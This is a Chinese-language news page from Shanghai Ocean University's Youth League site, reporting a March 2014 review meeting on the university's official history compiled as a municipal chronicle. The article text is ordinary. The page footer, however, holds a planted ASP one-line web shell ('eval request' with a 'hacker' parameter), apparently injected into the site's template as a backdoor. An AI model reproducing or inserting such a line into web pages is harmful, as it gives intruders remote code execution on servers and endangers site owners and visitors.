当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
市方志办在我校召开校志审定会
[2014年03月16日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    3月13日,上海市地方志办公室在我校军工路校区培训中心召开《上海市级专志·上海海洋大学志》审定会。上海市地方志办公室党组书记、主任洪民荣,副主任生键红,原副主任莫建备等10位审议专家,校党委书记、校志办主任吴嘉敏,原校长乐美龙、原副校长赵长春、原党委副书记李道恒等校志顾问组成员参加审定会。生键红主持审定会。校档案馆馆长宁波汇报了学校修志工作。与会领导、专家对校志发表审议意见,在总体肯定的基础上提出中肯建议。

 

    洪民荣在宣读审定意见时指出:《上海市级专志·上海海洋大学志》是一部基础很好的志稿,希望编纂人员在结构、写法、细节和文字上进一步推敲,精益求精,在审定稿基础上早日完成高质量的验收稿。

   吴嘉敏表示,各位专家对校志提出真知灼见,对提升校志质量提供了宝贵经验。百年海大需要一部与百年历史相称的海大志书。学校将按市级专志编纂要求,进一步修改完善,力争多一份努力、少一份遗憾,为学校、为上海市奉献一部高质量的志书。

   我校校志工作启动于2009年7月6日。2012年10月为满足百年校庆需要,先编撰出版《上海海洋大学百年志》。同时,作为上海市第二轮新编地方志书编纂规划65部专志之一,学校2012年11月起又根据市里编纂规范,在《百年志》基础上将170万字的篇幅压缩到90余万字,并对篇章结构和内容进行大幅调整。期间,在校志顾问组、编委和校志主笔辛勤努力下查阅资料、字斟句酌、反复考证、数易其稿,全校上上下下的修改有4次,审稿会累计召开91次,可谓众手成志。根据《上海市地方志书评审验收办法》,校志需要经过评议、审定、验收3个环节。2013年6月20日,校志成为首部通过评议的市级专志。此次通过审定,还需对校志进行篇目和内容修订,最终提交验收稿。

 

关闭窗口

上一篇:校领导到社会科学部调研思政课建设工作

下一篇:我校科普志愿者项目获浦东新区十佳青年公益项目称号
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>